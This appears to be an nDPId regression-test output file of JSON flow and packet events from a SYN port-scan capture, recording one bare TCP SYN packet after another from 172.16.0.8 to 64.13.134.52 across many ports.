-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"synscan.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsg4YAACoGmuysEAAIQA2GNIzSCDrdUoMYAAAAAGACDAAkVQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs28kAACgGRKmsEAAIQA2GNIzS8FzdUoMYAAAAAGACBABEMgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"synscan.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAsTfIAADkGwYCsEAAIQA2GNIzSAfHdUoMYAAAAAGACCAAungAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058221,"pkt":"ACYLMQczACWzv5HuCABFAAAs93kAACUGK\/msEAAIQA2GNIzSCzXdUoMYAAAAAGACCAAlWgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6669,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"synscan.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrdMAACcGc5+sEAAIQA2GNIzSGg3dUoMYAAAAAGACEAAOggAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZcAADMGp9usEAAIQA2GNIzSBZndUoMYAAAAAGACEAAi9gAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":188,"source":"synscan.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsF0kAACUGDCqsEAAIQA2GNIzSD6DdUoMYAAAAAGACCAAg7wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1043,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"synscan.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsM9YAADEG45ysEAAIQA2GNIzSBBPdUoMYAAAAAGACCAAsfAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9575,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"synscan.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUkAAADMGwzKsEAAIQA2GNIzSJWfdUoMYAAAAAGACEAADKAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"synscan.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsUOAAAC8GyJKsEAAIQA2GNIzSgADdUoMYAAAAAGACEACojgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1641,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"synscan.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsD6cAADIGBsysEAAIQA2GNIzSBmndUoMYAAAAAGACDAAmJgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"synscan.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsxQcAADIGUWusEAAIQA2GNIzSFsHdUoMYAAAAAGACDAAVzgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"synscan.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsiBIAADgGiGCsEAAIQA2GNIzSJqrdUoMYAAAAAGACBAAN5QAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsY2AAADUGsBKsEAAIQA2GNIzSatvdUoMYAAAAAGACCADFswAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1583,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"synscan.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAss00AACYGbyWsEAAIQA2GNIzSBi\/dUoMYAAAAAGACDAAmYAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"synscan.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsNBUAADsG2V2sEAAIQA2GNIzSGbTdUoMYAAAAAGACEAAO2wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"synscan.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058280,"pkt":"ACYLMQczACWzv5HuCABFAAAsz7wAACUGU7asEAAIQA2GNIzSC7ndUoMYAAAAAGACCAAk1gAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"synscan.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAsAdoAACsGG5msEAAIQA2GNIzSCI7dUoMYAAAAAGACEAAgAQAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058281,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058281,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"synscan.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1278275058281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058281,"pkt":"ACYLMQczACWzv5HuCABFAAAs2W4AACcGSASsEAAIQA2GNIzSwAPdUoMYAAAAAGACEABoiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs3SEAACsGQFGsEAAIQA2GNIzTCzXdU4MZAAAAAGACEAAdVwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":497,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"synscan.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsJv0AADkG6HWsEAAIQA2GNIzTAfHdU4MZAAAAAGACCAAumwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWIAADEGuhCsEAAIQA2GNIzT8FzdU4MZAAAAAGACCABALwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"synscan.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAsw9gAACsGWZqsEAAIQA2GNIzTCDrdU4MZAAAAAGACEAAgUgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs6AwAADoGJmasEAAIQA2GNIzTBDHdU4MZAAAAAGACDAAoWwAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058345,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13456,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"synscan.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058345,"pkt":"ACYLMQczACWzv5HuCABFAAAs5F4AACoGOhSsEAAIQA2GNIzTNJDdU4MZAAAAAGACDAD3+wAAAgQFtA=="} 